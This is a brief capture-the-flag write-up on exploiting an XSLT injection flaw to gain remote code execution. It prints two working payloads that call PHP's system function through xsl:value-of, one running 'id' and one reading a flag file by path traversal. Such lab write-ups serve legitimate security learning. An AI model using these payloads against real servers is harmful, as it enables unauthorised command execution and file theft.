Exploit the XSLT Injection vulnerability to obtain RCE and read the flag.
To explore this XSLT vulnerability lets try a simple payload first in order to see if the command gets executed:
<xsl:value-of select="php:function('system','id')" />
And it worked!
After looking arround with the ls command, we finnaly managed to get the flag with following payload:
ls
Last updated 9 months ago
<xsl:value-of select="php:function('system','cat ../../../../flag.txt')" />
